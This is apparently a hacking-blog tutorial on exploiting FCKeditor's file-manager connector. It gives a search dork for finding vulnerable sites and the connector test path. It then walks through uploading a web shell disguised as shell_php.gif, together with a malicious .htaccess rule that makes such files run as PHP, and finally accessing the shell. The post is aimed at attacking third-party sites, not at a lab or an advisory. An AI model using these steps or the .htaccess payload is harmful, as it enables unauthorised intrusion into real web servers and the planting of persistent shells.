Exploiting a FCKeditOr.






What you will need:

1) Modified .htaccess (Code is below)
2) Shell in name_php.gif format
3) Site with FCKeditor
Chapter I - Collecting vulnerable site

It's easy to dork one.
Simple dork:
Code:
inurl:fckeditor intitle:Connectors Test 
NOTE: Sometimes this method will not work. 

When you found a site navigate to the:
Code:
/fckeditor/editor/filemanager/browser/default/connectors/test.html 
So for example if you have your site like:
Code:
[URL='http://www.site.com/fckeditor/']http://www.site.com/fckeditor/ 
[/URL]

You add
Code:
editor/filemanager/browser/default/connectors/test.html 
You will get something like this:
[IMG]

Now here comes exploiting.
Chapter II - Exploiting

Select "PHP" from the top left drop menu and click "Get folders" if it comes up with this:

[IMG]

It means Connector is enabled and working.
Next thing you want to do is to create a new folder. 

[IMG]

When you created that click on "Get folders" again to check if it exists.

[IMG]

Open up notepad and paste you shell source in it.
Save it as shell_php.gif.

In current folder field enter your new folder (My case is tutorial-haxor) and press "Get folders" again.

[IMG]
[IMG]

Now just upload .htaccess and shell_php.gif

[IMG]

Just access your shell:

[IMG]

And thats it.
I hope you enjoyed this little tutorial.
Thanks for reading! :)

1) .htaccess code:
Code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>




Share your views...

0 Respones to "Exploiting a FCKeditOr."

Post a Comment

 

WhoIsAmoungUS

Trace

Copy Restrict

About Me

Scroll Button

Popular Posts

Counter

© 2014 Hacking-The Art of Exploitation All Rights Reserved Vishal S Sangwa A Ethical Hacker White Hat Hacker